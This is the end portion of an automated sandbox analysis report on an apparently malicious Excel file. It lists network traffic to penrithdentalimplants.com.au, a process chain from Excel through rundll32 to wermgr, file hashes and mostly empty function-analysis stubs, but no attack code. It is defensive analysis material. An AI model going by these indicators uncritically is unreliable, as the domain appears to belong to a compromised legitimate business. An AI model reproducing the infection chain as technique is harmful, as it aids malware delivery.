Jan 5, 2021 13:01:10.600080013 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.600090981 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.600122929 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.600140095 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.600157022 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.600214958 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.600233078 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.600245953 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.600249052 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.600265026 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.600281000 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.600295067 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.600296974 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.600308895 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.600348949 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.600356102 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.600373030 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.600388050 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.600402117 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.600404024 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.600446939 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.600707054 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.610342026 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.798475027 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 5, 2021 13:01:06.999558926 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 5, 2021 13:01:07.055907011 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
Jan 5, 2021 13:01:08.122844934 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 5, 2021 13:01:08.170912027 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22 |
Jan 5, 2021 13:01:08.184622049 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 5, 2021 13:01:08.232651949 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Jan 5, 2021 13:01:06.999558926 CET | 192.168.2.22 | 8.8.8.8 | 0x1168 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Jan 5, 2021 13:01:07.055907011 CET | 8.8.8.8 | 192.168.2.22 | 0x1168 | No error (0) | penrithdentalimplants.com.au | CNAME (Canonical name) | IN (0x0001) | ||
Jan 5, 2021 13:01:07.055907011 CET | 8.8.8.8 | 192.168.2.22 | 0x1168 | No error (0) | 160.153.76.195 | A (IP address) | IN (0x0001) |
HTTPS Packets |
---|
Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest |
---|---|---|---|---|---|---|---|---|---|---|
Jan 5, 2021 13:01:07.479768038 CET | 160.153.76.195 | 443 | 192.168.2.22 | 49167 | CN=penrithdentalimplants.com.au, O=Nepean Dental Implants and Cosmetic Dentistry, L=Penrith, ST=New South Wales, C=AU CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | Fri Aug 07 20:52:48 CEST 2020 Tue May 03 09:00:00 CEST 2011 | Wed Oct 06 15:19:58 CEST 2021 Sat May 03 09:00:00 CEST 2031 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0 | 7dcce5b76c8b17472d024758970a406b |
CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | Tue May 03 09:00:00 CEST 2011 | Sat May 03 09:00:00 CEST 2031 |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
High Level Behavior Distribution |
---|
back
Click to dive into process behavior distribution
Behavior |
---|
Click to jump to process
System Behavior |
---|
General |
---|
Start time: | 13:00:41 |
Start date: | 05/01/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f220000 |
File size: | 27641504 bytes |
MD5 hash: | 5FB0A0F93382ECD19F5F499A5CAA59F0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 13:00:50 |
Start date: | 05/01/2021 |
Path: | C:\Windows\System32\rundll32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xffcd0000 |
File size: | 45568 bytes |
MD5 hash: | DD81D91FF3B0763C392422865C9AC12E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
General |
---|
Start time: | 13:00:51 |
Start date: | 05/01/2021 |
Path: | C:\Windows\SysWOW64\rundll32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x900000 |
File size: | 44544 bytes |
MD5 hash: | 51138BEEA3E2C21EC44D0932C71762A8 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
General |
---|
Start time: | 13:00:52 |
Start date: | 05/01/2021 |
Path: | C:\Windows\System32\wermgr.exe |
Wow64 process (32bit): | |
Commandline: | |
Imagebase: | |
File size: | 50688 bytes |
MD5 hash: | 41DF7355A5A907E2C1D7804EC028965D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Disassembly |
---|
Code Analysis |
---|
Call Graph |
---|
Graph
- Entrypoint
- Decryption Function
- Executed
- Not Executed
- Show Help
Module: \x041b\x0438\x0441\x04421 |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "\x041b\x0438\x0441\x04421" |
2 | Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" |
3 | Attribute VB_GlobalNameSpace = False |
4 | Attribute VB_Creatable = False |
5 | Attribute VB_PredeclaredId = True |
6 | Attribute VB_Exposed = True |
7 | Attribute VB_TemplateDerived = False |
8 | Attribute VB_Customizable = True |
9 | Attribute VB_Control = "ListBox1, 2, 0, MSForms, ListBox" |
Executed Functions |
---|
C-Code - Quality: 76% |
|
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 100018B0, Relevance: 33.5, APIs: 12, Strings: 7, Instructions: 286libraryloadermemoryCOMMON
C-Code - Quality: 74% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 001E1030, Relevance: 18.4, APIs: 12, Instructions: 362libraryloaderCOMMON
APIs |
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 002E1000, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100windowtimesleepCOMMON
C-Code - Quality: 100% |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0032188B, Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 404processlibraryloaderCOMMON
APIs |
Strings |
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 001E14A0, Relevance: 12.2, APIs: 8, Instructions: 171COMMON
APIs |
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 001E21A0, Relevance: 6.2, APIs: 4, Instructions: 182COMMON
APIs |
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 10005FC1, Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMON
C-Code - Quality: 100% |
|
APIs |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 001E1D10, Relevance: 1.6, APIs: 1, Instructions: 112COMMON
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 1000631C, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
C-Code - Quality: 25% |
|
APIs |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 10001050, Relevance: 1.3, APIs: 1, Instructions: 22memoryCOMMON
C-Code - Quality: 100% |
|
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 001E19F0, Relevance: 1.3, APIs: 1, Instructions: 14memoryCOMMON
APIs |
|
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 001E1820, Relevance: 1.3, APIs: 1, Instructions: 11COMMON
APIs |
|
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Non-executed Functions |
---|
Function 100026C4, Relevance: 7.6, APIs: 5, Instructions: 57COMMON
C-Code - Quality: 85% |
|
APIs |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 100050A3, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
C-Code - Quality: 37% |
|
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 78% |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 001A095E, Relevance: .4, Instructions: 362COMMON
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 001A0456, Relevance: .1, Instructions: 80COMMON
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 100043B0, Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
C-Code - Quality: 91% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 100040D7, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 46libraryloaderCOMMON
C-Code - Quality: 86% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 1000462B, Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMON
C-Code - Quality: 39% |
|
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 10003954, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37libraryloaderCOMMON
C-Code - Quality: 65% |
|
APIs |
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 100014E0, Relevance: 6.1, APIs: 4, Instructions: 104COMMON
C-Code - Quality: 100% |
|
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 1000DEFB, Relevance: 6.1, APIs: 4, Instructions: 101COMMON
C-Code - Quality: 100% |
|
APIs |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 10003829, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
C-Code - Quality: 100% |
|
APIs |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 1000825B, Relevance: 6.0, APIs: 4, Instructions: 47COMMON
C-Code - Quality: 89% |
|
APIs |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 001E2430, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63memoryCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |